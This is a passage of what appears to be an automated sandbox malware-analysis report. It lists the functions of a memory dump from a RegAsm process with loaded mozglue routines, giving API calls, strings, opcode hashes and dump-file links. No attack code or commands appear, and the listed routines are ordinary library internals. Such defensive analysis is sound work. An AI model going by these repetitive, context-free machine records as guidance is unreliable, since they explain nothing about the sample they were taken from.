                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                        • String ID:
                                                        • API String ID: 1389714915-0
                                                        • Opcode ID: 71fece9fb5a6dc502a57fd34636fe65a9b1871ac60e78e3dcf3e4f1732c25a13
                                                        • Instruction ID: b45412c46b93d2624b132f5d9cceaf8a66e050fd388ecdbd8ba96a79c2d85253
                                                        • Opcode Fuzzy Hash: 71fece9fb5a6dc502a57fd34636fe65a9b1871ac60e78e3dcf3e4f1732c25a13
                                                        • Instruction Fuzzy Hash: C63100383006008FD724DF29C4D8E2AB7F5FF99319BA58598E55687B99C735EC41CB80
                                                        Function 6C0CB4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 6C0CB532
                                                        • moz_xmalloc.MOZGLUE(?), ref: 6C0CB55B
                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0CB56B
                                                        • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C0CB57E
                                                        • free.MOZGLUE(00000000), ref: 6C0CB58F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                        • String ID:
                                                        • API String ID: 4244350000-0
                                                        • Opcode ID: 3d03c2b5c0573585cd2f587211e79ff3d062c6e95a56530215af75b325cf92ba
                                                        • Instruction ID: 8c13e6de1baadce81e6a20423b5ee20e766e83b047aaa9e916de12ba561ffa72
                                                        • Opcode Fuzzy Hash: 3d03c2b5c0573585cd2f587211e79ff3d062c6e95a56530215af75b325cf92ba
                                                        • Instruction Fuzzy Hash: 0F21F371B002059BDB009F68CC40BAEBBF9FF86308F684129E818DB341E736D951CBA1
                                                        Function 6C0CB7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C0CB7CF
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C0CB808
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C0CB82C
                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0CB840
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0CB849
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                        • String ID:
                                                        • API String ID: 1977084945-0
                                                        • Opcode ID: c406178a8a29a66a2db629f39409ae91a26379409be722cdc5032f8c20782f6c
                                                        • Instruction ID: 283ea08ec94a6fd114355ab34710f74ff90b004ea467087572c6b63a5af2d260
                                                        • Opcode Fuzzy Hash: c406178a8a29a66a2db629f39409ae91a26379409be722cdc5032f8c20782f6c
                                                        • Instruction Fuzzy Hash: 89212CB4E002199FDF04DFA9D8856BEBBF4EF49318F148169EC15A7341E731A948CBA1
                                                        Function 6C126E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C126E78
                                                          • Part of subcall function 6C126A10: InitializeCriticalSection.KERNEL32(6C14F618), ref: 6C126A68
                                                          • Part of subcall function 6C126A10: GetCurrentProcess.KERNEL32 ref: 6C126A7D
                                                          • Part of subcall function 6C126A10: GetCurrentProcess.KERNEL32 ref: 6C126AA1
                                                          • Part of subcall function 6C126A10: EnterCriticalSection.KERNEL32(6C14F618), ref: 6C126AAE
                                                          • Part of subcall function 6C126A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C126AE1
                                                          • Part of subcall function 6C126A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C126B15
                                                          • Part of subcall function 6C126A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C126B65
                                                          • Part of subcall function 6C126A10: LeaveCriticalSection.KERNEL32(6C14F618,?,?), ref: 6C126B83
                                                        • MozFormatCodeAddress.MOZGLUE ref: 6C126EC1
                                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C126EE1
                                                        • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C126EED
                                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C126EFF
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                        • String ID:
                                                        • API String ID: 4058739482-0
                                                        • Opcode ID: 4327cdb9f14cc8d79c0317de9ea09925edcc673a31f171661ad58b6fd6a96776
                                                        • Instruction ID: 26c63353f5b9a5a422252dba9081045e6010e7a7ef4fc75a5d3b1357a451bd5c
                                                        • Opcode Fuzzy Hash: 4327cdb9f14cc8d79c0317de9ea09925edcc673a31f171661ad58b6fd6a96776
                                                        • Instruction Fuzzy Hash: B8219271A0421D9FDF10DF69D88569E77F5EF84308F048079E80D97241EB749A998F92
                                                        Function 6C1276C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WideCharToMultiByte.KERNEL32 ref: 6C1276F2
                                                        • moz_xmalloc.MOZGLUE(00000001), ref: 6C127705
                                                          • Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26
                                                        • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C127717
                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C12778F,00000000,00000000,00000000,00000000), ref: 6C127731
                                                        • free.MOZGLUE(00000000), ref: 6C127760
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                        • String ID:
                                                        • API String ID: 2538299546-0
                                                        • Opcode ID: 230a960c53dfee5047d3b606a40323c864e864c888a0193dbd5b601dfb59271c
                                                        • Instruction ID: 0b37af982e242ed40c2fa62edf6a956b1c602722599860256a072f9868352fa6
                                                        • Opcode Fuzzy Hash: 230a960c53dfee5047d3b606a40323c864e864c888a0193dbd5b601dfb59271c
                                                        • Instruction Fuzzy Hash: 9111B2B59013256BE710AF7ADC44BABBEF8EF55354F04452AF888A7300E774984087E2
                                                        Function 6C100D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C0C3DEF), ref: 6C100D71
                                                        • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C0C3DEF), ref: 6C100D84
                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C0C3DEF), ref: 6C100DAF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Virtual$Free$Alloc
                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                        • API String ID: 1852963964-2186867486
                                                        • Opcode ID: 22df84b9619c3ead37cd7aea095de694c942b352919409a5c77e442d0eb8047a
                                                        • Instruction ID: 137992ce22fed590718d5c82fd4a1ddb3fad33ad64c682075a0e6c8de92dc05d
                                                        • Opcode Fuzzy Hash: 22df84b9619c3ead37cd7aea095de694c942b352919409a5c77e442d0eb8047a
                                                        • Instruction Fuzzy Hash: 82F0893138179563E63429665C0AB6A275D67C2B65F34C036F608EA9C0DE64E410D7B5
                                                        Function 6C125850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 6C12586C
                                                        • CloseHandle.KERNEL32 ref: 6C125878
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C125898
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C1258C9
                                                        • free.MOZGLUE(00000000), ref: 6C1258D3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$CloseHandleObjectSingleWait
                                                        • String ID:
                                                        • API String ID: 1910681409-0
                                                        • Opcode ID: 57cec4bc54bed43e7e9de870e4f7dc06b9692a9b5221c70911fc50f830a80d43
                                                        • Instruction ID: f7bcb1135a6646d0de6d6d619b6f677c54fb6e859c9e7b1b51669c15b4509cc5
                                                        • Opcode Fuzzy Hash: 57cec4bc54bed43e7e9de870e4f7dc06b9692a9b5221c70911fc50f830a80d43
                                                        • Instruction Fuzzy Hash: 98014B79704201DBDB00FF2A9858A067BB8EB9332D724C176E53ADA310E7759824AF91
                                                        Function 6C117620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C1175C4,?), ref: 6C11762B
                                                          • Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26
                                                        • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C1174D7,6C1215FC,?,?,?), ref: 6C117644
                                                        • GetCurrentThreadId.KERNEL32 ref: 6C11765A
                                                        • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C1174D7,6C1215FC,?,?,?), ref: 6C117663
                                                        • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C1174D7,6C1215FC,?,?,?), ref: 6C117677
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                        • String ID:
                                                        • API String ID: 418114769-0
                                                        • Opcode ID: 8ab6061def72ab26304dfcebcd192467f63c03d9d07d85aadcbb743571b866ce
                                                        • Instruction ID: c7285869d74766df6de369c5310e4d225705e0dcf4b582c570c2a4c6377c1485
                                                        • Opcode Fuzzy Hash: 8ab6061def72ab26304dfcebcd192467f63c03d9d07d85aadcbb743571b866ce
                                                        • Instruction Fuzzy Hash: 02F0AF71E10B45ABD7009F22C888A7AB778FFEA25DF128356F90453601E7B0A5D08BD0
                                                        Function 6C121700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 6C121800
                                                          • Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
                                                          • Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA
                                                          • Part of subcall function 6C0C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C103EBD,6C103EBD,00000000), ref: 6C0C42A9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                        • String ID: Details$name${marker.name} - {marker.data.name}
                                                        • API String ID: 46770647-1733325692
                                                        • Opcode ID: b76fe7b6319bd9511e06b37dc8ecdbf13fea3ac7822ff20900e6e7546864c4e1
                                                        • Instruction ID: ecd853a6a8242ed04c3c23cfc8d48d0691d926d6735c1c55d9339c80f8fe7870
                                                        • Opcode Fuzzy Hash: b76fe7b6319bd9511e06b37dc8ecdbf13fea3ac7822ff20900e6e7546864c4e1
                                                        • Instruction Fuzzy Hash: 4471E3B1A003069FDB04DF28D4547AABBB1FF45304F108669D8254BB41D775FAA8CBE2
                                                        Function 6C12B0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • free.MOZGLUE(?,?,6C12B0A6,6C12B0A6,?,6C12AF67,?,00000010,?,6C12AF67,?,00000010,00000000,?,?,6C12AB1F), ref: 6C12B1F2
                                                        • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C12B0A6,6C12B0A6,?,6C12AF67,?,00000010,?,6C12AF67,?,00000010,00000000,?), ref: 6C12B1FF
                                                        • free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C12B0A6,6C12B0A6,?,6C12AF67,?,00000010,?,6C12AF67,?,00000010), ref: 6C12B25F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: free$Xlength_error@std@@
                                                        • String ID: map/set<T> too long
                                                        • API String ID: 1922495194-1285458680
                                                        • Opcode ID: d39faab5a236d0a79827d48afb7140e9fef06ed9e1ad2e6ab9b35baecbd4004d
                                                        • Instruction ID: d5511f60b888ef2eac0d42187cb01d8ab81f9c5c72dc3e85a40ff547ad88aae1
                                                        • Opcode Fuzzy Hash: d39faab5a236d0a79827d48afb7140e9fef06ed9e1ad2e6ab9b35baecbd4004d
                                                        • Instruction Fuzzy Hash: 57618B786042458FD701CF19D880A9ABBF1FF5A318F18C5A9D85A4BB52C339FC85CBA1
                                                        Function 6C0ED468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
                                                          • Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA
                                                        • EnterCriticalSection.KERNEL32(6C14E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C0FD1C5), ref: 6C0ED4F2
                                                        • LeaveCriticalSection.KERNEL32(6C14E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C0FD1C5), ref: 6C0ED50B
                                                          • Part of subcall function 6C0CCFE0: EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0CCFF6
                                                          • Part of subcall function 6C0CCFE0: LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0CD026
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C0FD1C5), ref: 6C0ED52E
                                                        • EnterCriticalSection.KERNEL32(6C14E7DC), ref: 6C0ED690
                                                        • LeaveCriticalSection.KERNEL32(6C14E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C0FD1C5), ref: 6C0ED751
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                        • String ID: MOZ_CRASH()
                                                        • API String ID: 3805649505-2608361144
                                                        • Opcode ID: e8d8856c8670784b0e633a78f4a044fc6ee1268df15b3edef348e61e64d32cbf
                                                        • Instruction ID: 5ea8c6e06616f42c7ae77462aa509ca8ec555798234df52b08f1a3c8f08a4f16
                                                        • Opcode Fuzzy Hash: e8d8856c8670784b0e633a78f4a044fc6ee1268df15b3edef348e61e64d32cbf
                                                        • Instruction Fuzzy Hash: 8F51F271A047018FD328CF28C09475AB7E5EFC9718F54892EDAA9C7B84E770E840CB91
                                                        Function 6C114630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: __aulldiv
                                                        • String ID: -%llu$.$profiler-paused
                                                        • API String ID: 3732870572-2661126502
                                                        • Opcode ID: a0edb8b6f636f0de5863a16855bac28f179bc04053b1bd45e31349b0321974e6
                                                        • Instruction ID: 3e67147d6a73b1adfb3222886f5699a57da412090ce70dc6af3c7224f87c9281
                                                        • Opcode Fuzzy Hash: a0edb8b6f636f0de5863a16855bac28f179bc04053b1bd45e31349b0321974e6
                                                        • Instruction Fuzzy Hash: 7C414671E086089BCB08DF78D85119EBBE5EF85B4CF10863DE859ABB81EB349845C751
                                                        Function 6C139830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C13985D
                                                        • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C13987D
                                                        • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C1398DE
                                                        Strings
                                                        • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C1398D9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                        • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                        • API String ID: 1778083764-3290996778
                                                        • Opcode ID: d386226134a32728742752cc467b256cff9d38dc1403fb4d4843273d8e1bb9f8
                                                        • Instruction ID: 2f269df8c9c821daf7cac0b9325325a68b7a1547e1dc9b9df484b96235abd98d
                                                        • Opcode Fuzzy Hash: d386226134a32728742752cc467b256cff9d38dc1403fb4d4843273d8e1bb9f8
                                                        • Instruction Fuzzy Hash: 4E313571B0010C6FDB14AF58D854AEF77E8DF84318F10842DEE2AABB40CB31A9158BE1
                                                        Function 6C1146E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __aulldiv.LIBCMT ref: 6C114721
                                                          • Part of subcall function 6C0C4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C103EBD,00000017,?,00000000,?,6C103EBD,?,?,6C0C42D2), ref: 6C0C4444
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: __aulldiv__stdio_common_vsprintf
                                                        • String ID: -%llu$.$profiler-paused
                                                        • API String ID: 680628322-2661126502
                                                        • Opcode ID: a8b831fdc376f066eb541726e1a0a0e66882ad58a2bc733a36371f0641375d51
                                                        • Instruction ID: bf0682062026c158e37f34b4a18a33eb8d000b1dfb673adefa7707c9017bda4e
                                                        • Opcode Fuzzy Hash: a8b831fdc376f066eb541726e1a0a0e66882ad58a2bc733a36371f0641375d51
                                                        • Instruction Fuzzy Hash: DC317C71F042084BCB0CCF6CD89129EBBE6DB88718F15853DE8159BB40EB74D8448B50
                                                        Function 6C11B410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C103EBD,6C103EBD,00000000), ref: 6C0C42A9
                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C11B127), ref: 6C11B463
                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C11B4C9
                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C11B4E4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: _getpidstrlenstrncmptolower
                                                        • String ID: pid:
                                                        • API String ID: 1720406129-3403741246
                                                        • Opcode ID: 04e61468ba15e1e96c321719be839cc696a0533fdc6e02e80e976b21bdb336a2
